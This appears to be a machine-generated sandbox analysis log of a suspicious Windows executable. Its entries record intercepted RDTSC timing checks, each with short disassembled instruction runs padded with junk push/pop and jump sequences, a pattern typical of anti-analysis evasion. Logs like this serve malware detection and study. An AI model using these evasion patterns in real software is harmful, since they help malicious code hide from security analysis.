Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A7F04D second address: A7F080 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FE1010EA794h 0x00000008 jmp 00007FE1010EA794h 0x0000000d jnp 00007FE1010EA786h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A7CEE8 second address: A7CEF2 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FE100E1706Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A8954B second address: A8954F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A8954F second address: A89568 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE100E17075h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A89568 second address: A895AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FE1010EA796h 0x0000000b jmp 00007FE1010EA796h 0x00000010 popad 0x00000011 jc 00007FE1010EA79Ah 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b jne 00007FE1010EA786h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A8913D second address: A89166 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FE100E17066h 0x00000008 jmp 00007FE100E17079h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f popad 0x00000010 push ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A89166 second address: A8916C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A9866E second address: A98674 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A98674 second address: A986A3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FE1010EA791h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jg 00007FE1010EA78Eh 0x00000011 push eax 0x00000012 push edx 0x00000013 jnp 00007FE1010EA786h 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A986A3 second address: A986B7 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jg 00007FE100E17066h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jp 00007FE100E1706Ch 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A982E3 second address: A982F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FE1010EA786h 0x0000000a push eax 0x0000000b pop eax 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A982F4 second address: A982F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A982F8 second address: A98338 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE1010EA794h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jns 00007FE1010EA79Bh 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jno 00007FE1010EA786h 0x0000001a push eax 0x0000001b pop eax 0x0000001c rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A98338 second address: A98353 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FE100E17073h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A98353 second address: A9835B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A9835B second address: A9835F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A9835F second address: A98369 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FE1010EA786h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A9C9D9 second address: A9C9EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 je 00007FE100E17066h 0x0000000d push eax 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A9C9EA second address: A9C9EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: AA151E second address: AA1543 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jo 00007FE100E1706Eh 0x0000000b push esi 0x0000000c pop esi 0x0000000d jl 00007FE100E17066h 0x00000013 pushad 0x00000014 pushad 0x00000015 popad 0x00000016 push ecx 0x00000017 pop ecx 0x00000018 push edx 0x00000019 pop edx 0x0000001a push ecx 0x0000001b pop ecx 0x0000001c popad 0x0000001d popad 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 pushad 0x00000022 popad 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: AA1543 second address: AA154E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FE1010EA786h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: AA41C1 second address: AA41CE instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: AA41CE second address: AA41D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: AA41D4 second address: AA41DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: AA41DC second address: AA41E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: AA41E2 second address: AA41E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: AA41E7 second address: AA420D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FE1010EA799h 0x0000000a jp 00007FE1010EA786h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: AA772C second address: AA7738 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a push esi 0x0000000b pop esi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: AA7738 second address: AA773C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: AB194E second address: AB1953 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: AB1953 second address: AB1958 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: AB1958 second address: AB195E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: AB5EC5 second address: AB5ECB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: AB5ECB second address: AB5ED2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: AB62F1 second address: AB62F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: AB62F5 second address: AB62FB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: AB62FB second address: AB6320 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007FE1010EA799h 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: AB6320 second address: AB6324 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: AB6324 second address: AB6328 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: AB6328 second address: AB632E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: AB64A7 second address: AB64F9 instructions: 0x00000000 rdtsc 0x00000002 js 00007FE1010EA786h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a js 00007FE1010EA78Ah 0x00000010 pushad 0x00000011 popad 0x00000012 pushad 0x00000013 popad 0x00000014 jne 00007FE1010EA79Ch 0x0000001a jmp 00007FE1010EA796h 0x0000001f popad 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 jmp 00007FE1010EA78Bh 0x00000028 jmp 00007FE1010EA78Bh 0x0000002d pushad 0x0000002e popad 0x0000002f popad 0x00000030 pushad 0x00000031 pushad 0x00000032 popad 0x00000033 push eax 0x00000034 push edx 0x00000035 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: AB64F9 second address: AB6500 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: AB67BE second address: AB67E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FE1010EA786h 0x0000000a popad 0x0000000b push eax 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e pop eax 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jno 00007FE1010EA791h 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: AB67E7 second address: AB67F3 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jnc 00007FE100E17066h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: AB67F3 second address: AB67F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: AB67F9 second address: AB6802 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: AB72CA second address: AB72CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: AB72CE second address: AB72D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: AB72D2 second address: AB72DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: ABA6CF second address: ABA6D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: ABA6D3 second address: ABA6D9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: ABCDBC second address: ABCDEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a jmp 00007FE100E17070h 0x0000000f jmp 00007FE100E17072h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: ABCDEA second address: ABCDFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FE1010EA78Ah 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: ABCDFD second address: ABCE03 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: ABCE03 second address: ABCE3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FE1010EA790h 0x0000000b popad 0x0000000c pushad 0x0000000d jmp 00007FE1010EA78Bh 0x00000012 push eax 0x00000013 push edx 0x00000014 push edi 0x00000015 pop edi 0x00000016 jmp 00007FE1010EA793h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: ABF6EE second address: ABF6F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: ABF6F2 second address: ABF6F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: ABF6F8 second address: ABF6FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: AFA552 second address: AFA557 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: B034B8 second address: B034BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: B10D31 second address: B10D35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: B10D35 second address: B10D49 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FE100E1706Ch 0x0000000d rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: B10D49 second address: B10D4D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: B1277A second address: B12797 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 jmp 00007FE100E17074h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: B12797 second address: B127A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: B127A1 second address: B127AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: B127AA second address: B127AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: B127AE second address: B127DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 jc 00007FE100E17066h 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 jmp 00007FE100E17076h 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b push edx 0x0000001c pop edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: B127DE second address: B127E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: BDF3EC second address: BDF41E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE100E17073h 0x00000009 jmp 00007FE100E17079h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: BDF6D0 second address: BDF6DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: BDFBAD second address: BDFBC5 instructions: 0x00000000 rdtsc 0x00000002 je 00007FE100E17072h 0x00000008 jns 00007FE100E17066h 0x0000000e jc 00007FE100E17066h 0x00000014 push eax 0x00000015 push edx 0x00000016 push edi 0x00000017 pop edi 0x00000018 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: BDFD1D second address: BDFD27 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: BDFD27 second address: BDFD71 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FE100E17066h 0x00000008 jmp 00007FE100E17071h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 jp 00007FE100E17066h 0x00000018 popad 0x00000019 popad 0x0000001a pushad 0x0000001b jmp 00007FE100E1706Dh 0x00000020 push eax 0x00000021 push edx 0x00000022 push edi 0x00000023 pop edi 0x00000024 jmp 00007FE100E17072h 0x00000029 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: BE0086 second address: BE0091 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jns 00007FE1010EA786h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: BE0091 second address: BE009A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: BE009A second address: BE00A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: BE45D0 second address: BE45D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: BE47C1 second address: BE47C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: BE47C7 second address: BE47DF instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FE100E1706Dh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: BE47DF second address: BE47F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE1010EA792h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: BE47F5 second address: BE47F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: BE47F9 second address: BE483D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push edx 0x0000000c call 00007FE1010EA788h 0x00000011 pop edx 0x00000012 mov dword ptr [esp+04h], edx 0x00000016 add dword ptr [esp+04h], 00000014h 0x0000001e inc edx 0x0000001f push edx 0x00000020 ret 0x00000021 pop edx 0x00000022 ret 0x00000023 jnl 00007FE1010EA788h 0x00000029 push 00000004h 0x0000002b js 00007FE1010EA78Ch 0x00000031 or dword ptr [ebp+12B73733h], ebx 0x00000037 push C7D5A989h 0x0000003c pushad 0x0000003d push edi 0x0000003e push eax 0x0000003f push edx 0x00000040 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: BE5EC3 second address: BE5EC9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: BE5EC9 second address: BE5ED3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 popad 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: BE7E55 second address: BE7E70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 jmp 00007FE100E17073h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: BE7E70 second address: BE7E84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE1010EA78Eh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 6EE0008 second address: 6EE0022 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop edi 0x00000005 mov ebx, ecx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xchg eax, ebp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FE100E1706Dh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 6EE0022 second address: 6EE0092 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE1010EA791h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007FE1010EA797h 0x00000011 add si, E31Eh 0x00000016 jmp 00007FE1010EA799h 0x0000001b popfd 0x0000001c push eax 0x0000001d push edx 0x0000001e pushfd 0x0000001f jmp 00007FE1010EA78Eh 0x00000024 sub ax, 7118h 0x00000029 jmp 00007FE1010EA78Bh 0x0000002e popfd 0x0000002f rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 6EE0092 second address: 6EE00A1 instructions: 0x00000000 rdtsc 0x00000002 mov bh, al 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, ebp 0x00000008 pushad 0x00000009 mov dh, 28h 0x0000000b push eax 0x0000000c push edx 0x0000000d mov edi, ecx 0x0000000f rdtsc
